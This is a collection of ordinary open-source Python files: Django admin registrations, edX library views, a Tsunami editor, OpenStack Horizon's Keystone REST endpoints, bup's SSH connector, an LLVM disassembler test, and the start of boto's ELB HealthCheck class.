admin.site.register(TaskTemplate, TaskTemplateAdmin)
admin.site.register(TaskRoleEnum)
admin.site.register(FileLog, FileLogAdmin)
admin.site.register(JobTemplate, JobTemplateAdmin)
admin.site.register(GroupTemplate, GroupTemplateAdmin)
admin.site.register(RecipeTemplate, RecipeTemplateAdmin)
admin.site.register(DistroTemplate, DistroTemplateAdmin)
admin.site.register(CheckProgress, CheckProgressAdmin)
|
gpl-2.0
|
Edraak/edraak-platform
|
cms/djangoapps/contentstore/views/library.py
|
14
|
10232
|
"""
Views related to content libraries.
A content library is a structure containing XBlocks which can be re-used in the
multiple courses.
"""
from __future__ import absolute_import
import logging
from django.conf import settings
from django.contrib.auth.decorators import login_required
from django.core.exceptions import PermissionDenied
from django.http import Http404, HttpResponseForbidden, HttpResponseNotAllowed
from django.utils.translation import ugettext as _
from django.views.decorators.csrf import ensure_csrf_cookie
from django.views.decorators.http import require_http_methods
from opaque_keys import InvalidKeyError
from opaque_keys.edx.keys import CourseKey
from opaque_keys.edx.locator import LibraryLocator, LibraryUsageLocator
from six import text_type
from contentstore.utils import add_instructor, reverse_library_url
from contentstore.views.item import create_xblock_info
from course_creators.views import get_course_creator_status
from edxmako.shortcuts import render_to_response
from student.auth import (
STUDIO_EDIT_ROLES,
STUDIO_VIEW_USERS,
get_user_permissions,
has_studio_read_access,
has_studio_write_access
)
from student.roles import CourseInstructorRole, CourseStaffRole, LibraryUserRole
from util.json_request import JsonResponse, JsonResponseBadRequest, expect_json
from xmodule.modulestore import ModuleStoreEnum
from xmodule.modulestore.django import modulestore
from xmodule.modulestore.exceptions import DuplicateCourseError
from .component import CONTAINER_TEMPLATES, get_component_templates
from .user import user_with_role
__all__ = ['library_handler', 'manage_library_users']
log = logging.getLogger(__name__)
LIBRARIES_ENABLED = settings.FEATURES.get('ENABLE_CONTENT_LIBRARIES', False)
def get_library_creator_status(user):
"""
Helper method for returning the library creation status for a particular user,
taking into account the value LIBRARIES_ENABLED.
"""
if not LIBRARIES_ENABLED:
return False
elif user.is_staff:
return True
elif settings.FEATURES.get('ENABLE_CREATOR_GROUP', False):
return get_course_creator_status(user) == 'granted'
else:
# EDUCATOR-1924: DISABLE_LIBRARY_CREATION overrides DISABLE_COURSE_CREATION, if present.
disable_library_creation = settings.FEATURES.get('DISABLE_LIBRARY_CREATION', None)
disable_course_creation = settings.FEATURES.get('DISABLE_COURSE_CREATION', False)
if disable_library_creation is not None:
return not disable_library_creation
else:
return not disable_course_creation
@login_required
@ensure_csrf_cookie
@require_http_methods(('GET', 'POST'))
def library_handler(request, library_key_string=None):
"""
RESTful interface to most content library related functionality.
"""
if not LIBRARIES_ENABLED:
log.exception("Attempted to use the content library API when the libraries feature is disabled.")
raise Http404 # Should never happen because we test the feature in urls.py also
if request.method == 'POST':
if not get_library_creator_status(request.user):
return HttpResponseForbidden()
if library_key_string is not None:
return HttpResponseNotAllowed(("POST",))
return _create_library(request)
else:
if library_key_string:
return _display_library(library_key_string, request)
return _list_libraries(request)
def _display_library(library_key_string, request):
"""
Displays single library
"""
library_key = CourseKey.from_string(library_key_string)
if not isinstance(library_key, LibraryLocator):
log.exception("Non-library key passed to content libraries API.") # Should never happen due to url regex
raise Http404 # This is not a library
if not has_studio_read_access(request.user, library_key):
log.exception(
u"User %s tried to access library %s without permission",
request.user.username, unicode(library_key)
)
raise PermissionDenied()
library = modulestore().get_library(library_key)
if library is None:
log.exception(u"Library %s not found", unicode(library_key))
raise Http404
response_format = 'html'
if (
request.GET.get('format', 'html') == 'json' or
'application/json' in request.META.get('HTTP_ACCEPT', 'text/html')
):
response_format = 'json'
return library_blocks_view(library, request.user, response_format)
def _list_libraries(request):
"""
List all accessible libraries
"""
lib_info = [
{
"display_name": lib.display_name,
"library_key": unicode(lib.location.library_key),
}
for lib in modulestore().get_libraries()
if has_studio_read_access(request.user, lib.location.library_key)
]
return JsonResponse(lib_info)
@expect_json
def _create_library(request):
"""
Helper method for creating a new library.
"""
display_name = None
try:
display_name = request.json['display_name']
org = request.json['org']
library = request.json.get('number', None)
if library is None:
library = request.json['library']
store = modulestore()
with store.default_store(ModuleStoreEnum.Type.split):
new_lib = store.create_library(
org=org,
library=library,
user_id=request.user.id,
fields={"display_name": display_name},
)
# Give the user admin ("Instructor") role for this library:
add_instructor(new_lib.location.library_key, request.user, request.user)
except KeyError as error:
log.exception("Unable to create library - missing required JSON key.")
return JsonResponseBadRequest({
"ErrMsg": _("Unable to create library - missing required field '{field}'").format(field=text_type(error))
})
except InvalidKeyError as error:
log.exception("Unable to create library - invalid key.")
return JsonResponseBadRequest({
"ErrMsg": _("Unable to create library '{name}'.\n\n{err}").format(name=display_name, err=text_type(error))
})
except DuplicateCourseError:
log.exception("Unable to create library - one already exists with the same key.")
return JsonResponseBadRequest({
'ErrMsg': _(
'There is already a library defined with the same '
'organization and library code. Please '
'change your library code so that it is unique within your organization.'
)
})
lib_key_str = unicode(new_lib.location.library_key)
return JsonResponse({
'url': reverse_library_url('library_handler', lib_key_str),
'library_key': lib_key_str,
})
def library_blocks_view(library, user, response_format):
"""
The main view of a course's content library.
Shows all the XBlocks in the library, and allows adding/editing/deleting
them.
Can be called with response_format="json" to get a JSON-formatted list of
the XBlocks in the library along with library metadata.
Assumes that read permissions have been checked before calling this.
"""
assert isinstance(library.location.library_key, LibraryLocator)
assert isinstance(library.location, LibraryUsageLocator)
children = library.children
if response_format == "json":
# The JSON response for this request is short and sweet:
prev_version = library.runtime.course_entry.structure['previous_version']
return JsonResponse({
"display_name": library.display_name,
"library_id": unicode(library.location.library_key),
"version": unicode(library.runtime.course_entry.course_key.version_guid),
"previous_version": unicode(prev_version) if prev_version else None,
"blocks": [unicode(x) for x in children],
})
can_edit = has_studio_write_access(user, library.location.library_key)
xblock_info = create_xblock_info(library, include_ancestor_info=False, graders=[])
component_templates = get_component_templates(library, library=True) if can_edit else []
return render_to_response('library.html', {
'can_edit': can_edit,
'context_library': library,
'component_templates': component_templates,
'xblock_info': xblock_info,
'templates': CONTAINER_TEMPLATES,
})
def manage_library_users(request, library_key_string):
"""
Studio UI for editing the users within a library.
Uses the /course_team/:library_key/:user_email/ REST API to make changes.
"""
library_key = CourseKey.from_string(library_key_string)
if not isinstance(library_key, LibraryLocator):
raise Http404 # This is not a library
user_perms = get_user_permissions(request.user, library_key)
if not user_perms & STUDIO_VIEW_USERS:
raise PermissionDenied()
library = modulestore().get_library(library_key)
if library is None:
raise Http404
# Segment all the users explicitly associated with this library, ensuring each user only has one role listed:
instructors = set(CourseInstructorRole(library_key).users_with_role())
staff = set(CourseStaffRole(library_key).users_with_role()) - instructors
users = set(LibraryUserRole(library_key).users_with_role()) - instructors - staff
formatted_users = []
for user in instructors:
formatted_users.append(user_with_role(user, 'instructor'))
for user in staff:
formatted_users.append(user_with_role(user, 'staff'))
for user in users:
formatted_users.append(user_with_role(user, 'library_user'))
return render_to_response('manage_users_lib.html', {
'context_library': library,
'users': formatted_users,
'allow_actions': bool(user_perms & STUDIO_EDIT_ROLES),
'library_key': unicode(library_key),
'lib_users_url': reverse_library_url('manage_library_users', library_key_string),
'show_children_previews': library.show_children_previews
})
|
agpl-3.0
|
vlegoff/tsunami
|
src/secondaires/navigation/editeurs/matedit/__init__.py
|
1
|
5288
|
# -*-coding:Utf-8 -*
# Copyright (c) 2010-2017 LE GOFF Vincent
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Package contenant l'éditeur 'matedit'.
Si des redéfinitions de contexte-éditeur standard doivent être faites, elles
seront placées dans ce package
Note importante : ce package contient la définition d'un éditeur, mais
celui-ci peut très bien être étendu par d'autres modules. Au quel cas,
les extensions n'apparaîtront pas ici.
"""
from primaires.interpreteur.editeur.description import Description
from primaires.interpreteur.editeur.entier import Entier
from primaires.interpreteur.editeur.presentation import Presentation
from primaires.interpreteur.editeur.uniligne import Uniligne
from .edt_aptitudes import EdtAptitudes
class EdtMatedit(Presentation):
"""Classe définissant l'éditeur de fiche de matelot 'matedit'."""
nom = "matedit"
def __init__(self, personnage, fiche):
"""Constructeur de l'éditeur"""
if personnage:
instance_connexion = personnage.instance_connexion
else:
instance_connexion = None
Presentation.__init__(self, instance_connexion, fiche)
if personnage and fiche:
self.construire(fiche)
def __getnewargs__(self):
return (None, None)
def construire(self, fiche):
"""Construction de l'éditeur"""
# Nom singulier
singulier = self.ajouter_choix("nom singulier", "n", Uniligne,
fiche, "nom_singulier")
singulier.parent = self
singulier.prompt = "Nom singulier avec déterminant : "
singulier.apercu = "{objet.nom_singulier}"
singulier.aide_courte = \
"Entrez le |ent|nom singulier|ff| du matelot ou |cmd|/|ff| " \
"pour revenir à la fenêtre parente.\n\nNom singulier actuel : " \
"|bc|{objet.nom_singulier}|ff|"
# Nom pluriel
pluriel = self.ajouter_choix("nom pluriel", "p", Uniligne,
fiche, "nom_pluriel")
pluriel.parent = self
pluriel.prompt = "Nom pluriel sans déterminant : "
pluriel.apercu = "{objet.nom_pluriel}"
pluriel.aide_courte = \
"Entrez le |ent|nom pluriel|ff| du matelot ou |cmd|/|ff| " \
"pour revenir à la fenêtre parente.\n\nNom pluriel actuel : " \
"|bc|{objet.nom_pluriel}|ff|"
# Description
description = self.ajouter_choix("description", "d", Description,
fiche)
description.parent = self
description.apercu = "{objet.description.paragraphes_indentes}"
description.aide_courte = \
"| |tit|" + "Description de la fiche de matelot {}".format(
fiche.cle).ljust(76) + "|ff||\n" + self.opts.separateur
# Poste par défaut
poste = self.ajouter_choix("poste par défaut", "t", Uniligne,
fiche, "poste_defaut")
poste.parent = self
poste.prompt = "Nom du poste par défaut du matelot : "
poste.apercu = "{objet.poste_defaut}"
poste.aide_courte = \
"Entrez le |ent|nom du poste|ff| du matelot ou |cmd|/|ff| " \
"pour revenir à la fenêtre parente.\n\nPoste actuel : " \
"|bc|{objet.poste_defaut}|ff|"
# Aptitudes
aptitudes = self.ajouter_choix("aptitudes", "a", EdtAptitudes,
fiche)
aptitudes.parent = self
# Prix unitaire
prix = self.ajouter_choix("prix unitaire", "u", Entier, fiche,
"m_valeur")
prix.parent = self
prix.apercu = "{objet.m_valeur} pièces de bronze"
prix.prompt = "Entrez le prix du matelot : "
prix.aide_courte = \
"Entrez |ent|le prix|ff| du matelot.\n\nPrix actuel : " \
"{objet.m_valeur} pièces de bronze"
|
bsd-3-clause
|
kogotko/carburetor
|
openstack_dashboard/api/rest/keystone.py
|
1
|
19555
|
# Copyright 2014, Rackspace, US, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""API over the keystone service.
"""
from django.conf import settings
import django.http
from django.views import generic
from openstack_dashboard import api
from openstack_dashboard.api.rest import urls
from openstack_dashboard.api.rest import utils as rest_utils
@urls.register
class Version(generic.View):
"""API for active keystone version.
"""
url_regex = r'keystone/version/$'
@rest_utils.ajax()
def get(self, request):
"""Get active keystone version.
"""
return {'version': str(api.keystone.get_version())}
@urls.register
class Users(generic.View):
"""API for keystone users.
"""
url_regex = r'keystone/users/$'
client_keywords = {'project_id', 'domain_id', 'group_id'}
@rest_utils.ajax()
def get(self, request):
"""Get a list of users.
By default, a listing of all users for the current domain are
returned. You may specify GET parameters for project_id, domain_id and
group_id to change that listing's context.
The listing result is an object with property "items".
"""
domain_context = request.session.get('domain_context')
filters = rest_utils.parse_filters_kwargs(request,
self.client_keywords)[0]
if len(filters) == 0:
filters = None
result = api.keystone.user_list(
request,
project=request.GET.get('project_id'),
domain=request.GET.get('domain_id', domain_context),
group=request.GET.get('group_id'),
filters=filters
)
return {'items': [u.to_dict() for u in result]}
@rest_utils.ajax(data_required=True)
def post(self, request):
"""Create a user.
Create a user using the parameters supplied in the POST
application/json object. The base parameters are name (string), email
(string, optional), password (string, optional), project_id (string,
optional), enabled (boolean, defaults to true). The user will be
created in the default domain.
This action returns the new user object on success.
"""
domain = api.keystone.get_default_domain(request)
new_user = api.keystone.user_create(
request,
name=request.DATA['name'],
email=request.DATA.get('email') or None,
password=request.DATA.get('password'),
project=request.DATA.get('project_id') or None,
enabled=True,
domain=domain.id
)
return rest_utils.CreatedResponse(
'/api/keystone/users/%s' % new_user.id,
new_user.to_dict()
)
@rest_utils.ajax(data_required=True)
def delete(self, request):
"""Delete multiple users by id.
The DELETE data should be an application/json array of user ids to
delete.
This method returns HTTP 204 (no content) on success.
"""
for user_id in request.DATA:
if user_id != request.user.id:
api.keystone.user_delete(request, user_id)
@urls.register
class User(generic.View):
"""API for a single keystone user.
"""
url_regex = r'keystone/users/(?P<id>[0-9a-f]+|current)$'
@rest_utils.ajax()
def get(self, request, id):
"""Get a specific user by id.
If the id supplied is 'current' then the current logged-in user
will be returned, otherwise the user specified by the id.
"""
if id == 'current':
id = request.user.id
return api.keystone.user_get(request, id).to_dict()
@rest_utils.ajax()
def delete(self, request, id):
"""Delete a single user by id.
This method returns HTTP 204 (no content) on success.
"""
if id == 'current':
raise django.http.HttpResponseNotFound('current')
api.keystone.user_delete(request, id)
@rest_utils.ajax(data_required=True)
def patch(self, request, id):
"""Update a single user.
The PATCH data should be an application/json object with attributes to
set to new values: password (string), project (string),
enabled (boolean).
A PATCH may contain any one of those attributes, but
if it contains more than one it must contain the project, even
if it is not being altered.
This method returns HTTP 204 (no content) on success.
"""
keys = tuple(request.DATA)
user = api.keystone.user_get(request, id)
if 'password' in keys:
password = request.DATA['password']
api.keystone.user_update_password(request, user, password)
elif 'enabled' in keys:
enabled = request.DATA['enabled']
api.keystone.user_update_enabled(request, user, enabled)
else:
# note that project is actually project_id
# but we can not rename due to legacy compatibility
# refer to keystone.api user_update method
api.keystone.user_update(request, user, **request.DATA)
@urls.register
class Roles(generic.View):
"""API over all roles.
"""
url_regex = r'keystone/roles/$'
@rest_utils.ajax()
def get(self, request):
"""Get a list of roles.
By default a listing of all roles are returned.
If the GET parameters project_id and user_id are specified then that
user's roles for that project are returned. If user_id is 'current'
then the current user's roles for that project are returned.
The listing result is an object with property "items".
"""
project_id = request.GET.get('project_id')
user_id = request.GET.get('user_id')
if project_id and user_id:
if user_id == 'current':
user_id = request.user.id
roles = api.keystone.roles_for_user(request, user_id,
project_id) or []
items = [r.to_dict() for r in roles]
else:
items = [r.to_dict() for r in api.keystone.role_list(request)]
return {'items': items}
@rest_utils.ajax(data_required=True)
def post(self, request):
"""Create a role.
Create a role using the "name" (string) parameter supplied in the POST
application/json object.
This method returns the new role object on success.
"""
new_role = api.keystone.role_create(request, request.DATA['name'])
return rest_utils.CreatedResponse(
'/api/keystone/roles/%s' % new_role.id,
new_role.to_dict()
)
@rest_utils.ajax(data_required=True)
def delete(self, request):
"""Delete multiple roles by id.
The DELETE data should be an application/json array of role ids to
delete.
This method returns HTTP 204 (no content) on success.
"""
for role_id in request.DATA:
api.keystone.role_delete(request, role_id)
@urls.register
class Role(generic.View):
"""API for a single role.
"""
url_regex = r'keystone/roles/(?P<id>[0-9a-f]+|default)$'
@rest_utils.ajax()
def get(self, request, id):
"""Get a specific role by id.
If the id supplied is 'default' then the default role will be
returned, otherwise the role specified by the id.
"""
if id == 'default':
return api.keystone.get_default_role(request).to_dict()
return api.keystone.role_get(request, id).to_dict()
@rest_utils.ajax()
def delete(self, request, id):
"""Delete a single role by id.
This method returns HTTP 204 (no content) on success.
"""
if id == 'default':
raise django.http.HttpResponseNotFound('default')
api.keystone.role_delete(request, id)
@rest_utils.ajax(data_required=True)
def patch(self, request, id):
"""Update a single role.
The PATCH data should be an application/json object with the "name"
attribute to update.
This method returns HTTP 204 (no content) on success.
"""
api.keystone.role_update(request, id, request.DATA['name'])
@urls.register
class Domains(generic.View):
"""API over all domains.
"""
url_regex = r'keystone/domains/$'
@rest_utils.ajax()
def get(self, request):
"""Get a list of domains.
A listing of all domains are returned.
The listing result is an object with property "items".
"""
items = [d.to_dict() for d in api.keystone.domain_list(request)]
return {'items': items}
@rest_utils.ajax(data_required=True)
def post(self, request):
"""Perform some action on the collection of domains.
This action creates a domain using parameters supplied in the POST
application/json object. The "name" (string) parameter is required,
others are optional: "description" (string) and "enabled" (boolean,
defaults to true).
This method returns the new domain object on success.
"""
new_domain = api.keystone.domain_create(
request,
request.DATA['name'],
description=request.DATA.get('description'),
enabled=request.DATA.get('enabled', True),
)
return rest_utils.CreatedResponse(
'/api/keystone/domains/%s' % new_domain.id,
new_domain.to_dict()
)
@rest_utils.ajax(data_required=True)
def delete(self, request):
"""Delete multiple domains by id.
The DELETE data should be an application/json array of domain ids to
delete.
This method returns HTTP 204 (no content) on success.
"""
for domain_id in request.DATA:
api.keystone.domain_delete(request, domain_id)
@urls.register
class Domain(generic.View):
"""API over a single domains.
"""
url_regex = r'keystone/domains/(?P<id>[0-9a-f]+|default)$'
@rest_utils.ajax()
def get(self, request, id):
"""Get a specific domain by id.
If the id supplied is 'default' then the default domain will be
returned, otherwise the domain specified by the id.
"""
if id == 'default':
return api.keystone.get_default_domain(request).to_dict()
return api.keystone.domain_get(request, id).to_dict()
@rest_utils.ajax()
def delete(self, request, id):
"""Delete a single domain by id.
This method returns HTTP 204 (no content) on success.
"""
if id == 'default':
raise django.http.HttpResponseNotFound('default')
api.keystone.domain_delete(request, id)
@rest_utils.ajax(data_required=True)
def patch(self, request, id):
"""Update a single domain.
The PATCH data should be an application/json object with the attributes
to set to new values: "name" (string), "description" (string) and
"enabled" (boolean).
This method returns HTTP 204 (no content) on success.
"""
api.keystone.domain_update(
request,
id,
description=request.DATA.get('description'),
enabled=request.DATA.get('enabled'),
name=request.DATA.get('name')
)
def _tenant_kwargs_from_DATA(data, enabled=True):
# tenant_create takes arbitrary keyword arguments with only a small
# restriction (the default args)
kwargs = {'name': None, 'description': None, 'enabled': enabled,
'domain': data.pop('domain_id', None)}
kwargs.update(data)
return kwargs
@urls.register
class Projects(generic.View):
"""API over all projects.
Note that in the following "project" is used exclusively where in the
underlying keystone API the terms "project" and "tenant" are used
interchangeably.
"""
url_regex = r'keystone/projects/$'
client_keywords = {'paginate', 'marker', 'domain_id',
'user_id', 'admin'}
@rest_utils.ajax()
def get(self, request):
"""Get a list of projects.
By default a listing of all projects for the current domain are
returned.
You may specify GET parameters for domain_id (string), user_id
(string) and admin (boolean) to change that listing's context.
Additionally, paginate (boolean) and marker may be used to get
paginated listings.
The listing result is an object with properties:
items
The list of project objects.
has_more
Boolean indicating there are more results when pagination is used.
"""
filters = rest_utils.parse_filters_kwargs(request,
self.client_keywords)[0]
if len(filters) == 0:
filters = None
paginate = request.GET.get('paginate') == 'true'
admin = False if request.GET.get('admin') == 'false' else True
result, has_more = api.keystone.tenant_list(
request,
paginate=paginate,
marker=request.GET.get('marker'),
domain=request.GET.get('domain_id'),
user=request.GET.get('user_id'),
admin=admin,
filters=filters
)
# return (list of results, has_more_data)
return dict(has_more=has_more, items=[d.to_dict() for d in result])
@rest_utils.ajax(data_required=True)
def post(self, request):
"""Create a project (tenant).
Create a project using parameters supplied in the POST
application/json object. The "name" (string) parameter is required,
others are optional: "description" (string), "domain_id" (string) and
"enabled" (boolean, defaults to true). Additional, undefined
parameters may also be provided, but you'll have to look deep into
keystone to figure out what they might be.
This method returns the new project object on success.
"""
kwargs = _tenant_kwargs_from_DATA(request.DATA)
if not kwargs['name']:
raise rest_utils.AjaxError(400, '"name" is required')
new_project = api.keystone.tenant_create(
request,
kwargs.pop('name'),
**kwargs
)
return rest_utils.CreatedResponse(
'/api/keystone/projects/%s' % new_project.id,
new_project.to_dict()
)
@rest_utils.ajax(data_required=True)
def delete(self, request):
"""Delete multiple projects by id.
The DELETE data should be an application/json array of project ids to
delete.
This method returns HTTP 204 (no content) on success.
"""
for id in request.DATA:
api.keystone.tenant_delete(request, id)
@urls.register
class Project(generic.View):
"""API over a single project.
Note that in the following "project" is used exclusively where in the
underlying keystone API the terms "project" and "tenant" are used
interchangeably.
"""
url_regex = r'keystone/projects/(?P<id>[0-9a-f]+)$'
@rest_utils.ajax()
def get(self, request, id):
"""Get a specific project by id.
"""
return api.keystone.tenant_get(request, id).to_dict()
@rest_utils.ajax()
def delete(self, request, id):
"""Delete a single project by id.
This method returns HTTP 204 (no content) on success.
"""
api.keystone.tenant_delete(request, id)
@rest_utils.ajax(data_required=True)
def patch(self, request, id):
"""Update a single project.
The PATCH data should be an application/json object with the
attributes to set to new values: "name" (string), "description"
(string), "domain_id" (string) and "enabled" (boolean). Additional,
undefined parameters may also be provided, but you'll have to look
deep into keystone to figure out what they might be.
This method returns HTTP 204 (no content) on success.
"""
kwargs = _tenant_kwargs_from_DATA(request.DATA, enabled=None)
api.keystone.tenant_update(request, id, **kwargs)
@urls.register
class ProjectRole(generic.View):
url_regex = r'keystone/projects/(?P<project_id>[0-9a-f]+)/' \
'(?P<role_id>[0-9a-f]+)/(?P<user_id>[0-9a-f]+)$'
@rest_utils.ajax()
def put(self, request, project_id, role_id, user_id):
"""Grant the specified role to the user in the project (tenant).
This method takes no data.
This method returns HTTP 204 (no content) on success.
"""
api.keystone.add_tenant_user_role(
request,
project_id,
user_id,
role_id
)
@urls.register
class ServiceCatalog(generic.View):
url_regex = r'keystone/svc-catalog/$'
@rest_utils.ajax()
def get(self, request):
"""Return the Keystone service catalog associated with the current
user.
"""
return request.user.service_catalog
@urls.register
class UserSession(generic.View):
"""API for a single keystone user.
"""
url_regex = r'keystone/user-session/$'
allowed_fields = {
'available_services_regions',
'domain_id',
'domain_name',
'enabled',
'id',
'is_superuser',
'project_id',
'project_name',
'roles',
'services_region',
'user_domain_id',
'user_domain_name',
'username'
}
@rest_utils.ajax()
def get(self, request):
"""Get the current user session.
"""
res = {k: getattr(request.user, k, None) for k in self.allowed_fields}
if getattr(settings, 'ENABLE_CLIENT_TOKEN', True):
res['token'] = request.user.token.id
return res
@urls.register
class Services(generic.View):
"""API for keystone services.
"""
url_regex = r'keystone/services/$'
@rest_utils.ajax()
def get(self, request):
"""Get a list of keystone services.
"""
region = request.user.services_region
services = []
for i, service in enumerate(request.user.service_catalog):
services.append(
dict(api.keystone.Service(service, region).to_dict(), id=i)
)
return {'items': services}
@urls.register
class Groups(generic.View):
"""API over all groups.
"""
url_regex = r'keystone/groups/$'
@rest_utils.ajax()
def get(self, request):
"""Get a list of groups.
The listing result is an object with property "items".
"""
domain_context = request.session.get('domain_context')
items = [d.to_dict() for d in api.keystone.group_list(
request, domain=request.GET.get('domain_id', domain_context))]
return {'items': items}
|
apache-2.0
|
Drooids/odoo
|
addons/l10n_multilang/__init__.py
|
438
|
1082
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import account
import l10n_multilang
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
ultilix/catawampus
|
tr/vendor/bup/lib/bup/ssh.py
|
8
|
1763
|
"""SSH connection.
Connect to a remote host via SSH and execute a command on the host.
"""
import sys, os, re, subprocess
from bup import helpers, path
def connect(rhost, port, subcmd):
"""Connect to 'rhost' and execute the bup subcommand 'subcmd' on it."""
assert(not re.search(r'[^\w-]', subcmd))
nicedir = re.sub(r':', "_", path.exedir())
if rhost == '-':
rhost = None
if not rhost:
argv = ['bup', subcmd]
else:
# WARNING: shell quoting security holes are possible here, so we
# have to be super careful. We have to use 'sh -c' because
# csh-derived shells can't handle PATH= notation. We can't
# set PATH in advance, because ssh probably replaces it. We
# can't exec *safely* using argv, because *both* ssh and 'sh -c'
# allow shellquoting. So we end up having to double-shellquote
# stuff here.
escapedir = re.sub(r'([^\w/])', r'\\\\\\\1', nicedir)
buglvl = helpers.atoi(os.environ.get('BUP_DEBUG'))
force_tty = helpers.atoi(os.environ.get('BUP_FORCE_TTY'))
cmd = r"""
sh -c PATH=%s:'$PATH BUP_DEBUG=%s BUP_FORCE_TTY=%s bup %s'
""" % (escapedir, buglvl, force_tty, subcmd)
argv = ['ssh']
if port:
argv.extend(('-p', port))
argv.extend((rhost, '--', cmd.strip()))
#helpers.log('argv is: %r\n' % argv)
def setup():
# runs in the child process
if not rhost:
os.environ['PATH'] = ':'.join([nicedir,
os.environ.get('PATH', '')])
os.setsid()
return subprocess.Popen(argv, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
preexec_fn=setup)
|
apache-2.0
|
vinutah/apps
|
tools/llvm/llvm_39/opt/bindings/python/llvm/tests/test_disassembler.py
|
97
|
1475
|
from .base import TestBase
from ..disassembler import Disassembler, Option_UseMarkup
class TestDisassembler(TestBase):
def test_instantiate(self):
Disassembler('i686-apple-darwin9')
def test_basic(self):
sequence = '\x67\xe3\x81' # jcxz -127
triple = 'i686-apple-darwin9'
disassembler = Disassembler(triple)
count, s = disassembler.get_instruction(sequence)
self.assertEqual(count, 3)
self.assertEqual(s, '\tjcxz\t-127')
def test_nonexistent_triple(self):
with self.assertRaisesRegexp(Exception, "Could not obtain disassembler for triple"):
Disassembler("nonexistent-triple-raises")
def test_get_instructions(self):
sequence = '\x67\xe3\x81\x01\xc7' # jcxz -127; addl %eax, %edi
disassembler = Disassembler('i686-apple-darwin9')
instructions = list(disassembler.get_instructions(sequence))
self.assertEqual(len(instructions), 2)
self.assertEqual(instructions[0], (0, 3, '\tjcxz\t-127'))
self.assertEqual(instructions[1], (3, 2, '\taddl\t%eax, %edi'))
def test_set_options(self):
sequence = '\x10\x40\x2d\xe9'
triple = 'arm-linux-android'
disassembler = Disassembler(triple)
disassembler.set_options(Option_UseMarkup)
count, s = disassembler.get_instruction(sequence)
print s
self.assertEqual(count, 4)
self.assertEqual(s, '\tpush\t{<reg:r4>, <reg:lr>}')
|
gpl-3.0
|
yg257/Pangea
|
lib/boto-2.34.0/boto/ec2/elb/healthcheck.py
|
185
|
3775
|
# Copyright (c) 2006-2012 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2012 Amazon.com, Inc. or its affiliates.
# All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
class HealthCheck(object):
"""
Represents an EC2 Access Point Health Check. See
:ref:`elb-configuring-a-health-check` for a walkthrough on configuring
load balancer health checks.
"""
def __init__(self, access_point=None, interval=30, target=None,
healthy_threshold=3, timeout=5, unhealthy_threshold=5):
"""
:ivar str access_point: The name of the load balancer this
health check is associated with.
:ivar int interval: Specifies how many seconds there are between
health checks.
:ivar str target: Determines what to check on an instance. See the
Amazon HealthCheck_ documentation for possible Target values.
.. _HealthCheck: http://docs.amazonwebservices.com/ElasticLoadBalancing/latest/APIReference/API_HealthCheck.html
"""
self.access_point = access_point
self.interval = interval
self.target = target
self.healthy_threshold = healthy_threshold
self.timeout = timeout
